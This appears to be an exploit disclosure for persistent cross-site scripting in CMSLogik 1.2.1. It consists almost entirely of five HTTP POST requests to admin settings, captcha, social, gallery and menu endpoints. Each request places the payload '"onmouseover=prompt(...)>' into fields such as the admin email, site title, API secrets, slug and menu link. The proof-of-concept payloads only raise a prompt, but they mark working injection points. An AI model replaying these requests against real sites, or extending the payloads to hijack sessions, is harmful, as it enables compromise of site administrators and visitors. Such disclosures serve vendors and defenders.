
CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities
==============================================================================

POST http://www.example.com/cmslogik/admin/settings HTTP/1.1

admin_email	"onmouseover=prompt("XSS1")>
default_level	2
default_page	1
default_url	http://themelogik.com/cmslogik/
email_activate	0
header_title	"onmouseover=prompt("XSS2")>
login	1
registration	1
site_title	"onmouseover=prompt("XSS3")>
update_settings	Update Settings
welcome_email	0

==============================================================================

POST http://www.example.com/cmslogik/admin/captcha_settings HTTP/1.1

captcha_settings	Update
recaptcha_private	"onmouseover=prompt("XSS4")>
recaptcha_public	"onmouseover=prompt("XSS5")>

==============================================================================

POST http://www.example.com/cmslogik/admin/social_settings HTTP/1.1

fb_appid	"onmouseover=prompt("XSS6")>
fb_secret	"onmouseover=prompt("XSS7")>
social_settings	Update
tw_consumer_key	"onmouseover=prompt("XSS8")>
tw_consumer_secret	"onmouseover=prompt("XSS9")>

==============================================================================

POST http://www.example.com/cmslogik/admin/gallery/save_item_settings HTTP/1.1

imgid	76
long	test
short	test
slug	"onmouseover=prompt("XSS10")>
status	live
title	test

==============================================================================

POST http://www.example.com/cmslogik/admin/edit_menu_item_ajax HTTP/1.1

item_link	"onmouseover=prompt("XSS11")>
item_name	test
item_order	0
mid	9

==============================================================================
